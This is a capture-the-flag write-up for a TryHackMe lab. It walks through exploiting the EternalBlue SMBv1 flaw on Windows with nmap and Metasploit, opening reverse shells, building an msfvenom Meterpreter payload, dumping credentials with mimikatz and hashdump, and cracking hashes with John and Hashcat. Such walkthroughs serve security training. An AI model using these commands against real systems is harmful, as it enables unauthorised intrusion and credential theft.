THM-EternalBlue -Write Up
Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
Find This Room: Blue
What Is EternalBlue
EternalBlue is a vulnerability in the SMBv1 (Server Message Block) protocol that allows remote command execution.
This vulnerability was discovered in Windows 7 and Windows Server 2008. The vulnerability has been widely exploited by ransomware such as WannaCry.
1- Recon
Determining the goal :
Specify the IP address of the target device.
OS :
If you know the type of operating system, this will help you determine how to take advantage of the vulnerability.
You can use tools like nmap or netcat to collect this information.
SMB port analysis
Port scanning using nmap
Determine port status:
nmap -p 445 <target_ip>
Full scan :
To look for additional details, you can scan all ports and see what services and applications are running on the device.
nmap -p 1-65535 -T4 -A -v <target_ip>
Options :
-p 1–65535: Scan all ports.
-T4 : Speed up scanning.
-A : Activate system and service discovery.
-v: Show details.
Verify the vulnerability
Use Metasploit
Select the appropriate tool:
Open Metasploit Console and use EternalBlue’s custom exploit.
2- Gain Accsess
Start Metasploit
msfconsole
Exploitation code we will run against the machine.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
set LHOST <Your_IP>
set RHOST <Target_IP>
set PAYLOAD windows/x64/shell/reverse_tcp
Vulnerability verification :
Check if the device is vulnerable to exploitation.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 192.168.1.10:445 - The target is vulnerable.
Implementation of exploitation:
If the device is vulnerable, you can perform the exploit to gain access to the device.
exploit
3- Esclate
Escalate privileges, learn how to upgrade shells in metasploit.
Background the previously gained shell (CTRL + Z)
Convert a command shell to a Meterpreter shell in Metasploit
1- Using the sessions -u
Command:
- After gaining a shell session on the target machine, you can use the
sessions
command to upgrade it to a Meterpreter session. First, list your active sessions to find the session ID:
sessions
Once you have the session ID (e.g., 1
), run the following command to upgrade the shell session to Meterpreter:
sessions -u 1
2- Using the shell_to_meterpreter
Post-Exploit Module:
- Metasploit provides a specific post-exploit module designed to upgrade a shell to Meterpreter. Load the module and set the session ID you want to upgrade:
use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit
This method will automatically select the best Meterpreter payload based on the target platform.
3- Manual Payload Injection:
- If you prefer a more hands-on approach, you can manually inject a Meterpreter payload into the shell. Generate a Meterpreter payload using
msfvenom
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe > meterpreter.exe
Transfer this payload to the target machine using your command shell, and execute it to establish a Meterpreter session.
4- Cracking
1-Fetch saved passwords in Windows
Using Mimikatz with Meterpreter
Download Mimikatz in session:
After getting a Meterpreter session, you can download Mimikatz.
meterpreter > load mimikatz
Using Mimikatz to fetch passwords:
After downloading Mimikatz, use the kiwi command to fetch the passwords.
meterpreter > kiwi_cmd kerberos::list /export
Extract passwords :
Use the following command to extract plain text passwords from memory.
meterpreter > creds_all
Use post/windows/gather/hashdump
Select session:
After obtaining the Meterpreter session, use the hashdump module to fetch the password hashes.
meterpreter > use post/windows/gather/hashdump
meterpreter > set SESSION 1
meterpreter > run
2- Decrypt password hashes
Use John the Ripper
Download John the Ripper:
Make sure you have downloaded and installed John the Ripper.
Save hashes to a file:
Save the hashes you obtained from hashdump to a text file, such as hashes.txt.
Run John the Ripper:
Use John the Ripper to decrypt the hashes.
john --format=NT hashes.txt
Use Hashcat
Download Hashcat:
Make sure you have downloaded and installed Hashcat.
Run Hashcat:
Use Hashcat to decrypt hashes.
hashcat -m 1000 -a 0 hashes.txt /path/to/wordlist.txt
Happy Hacking
Follow Me :
Support
patreon.com/mosec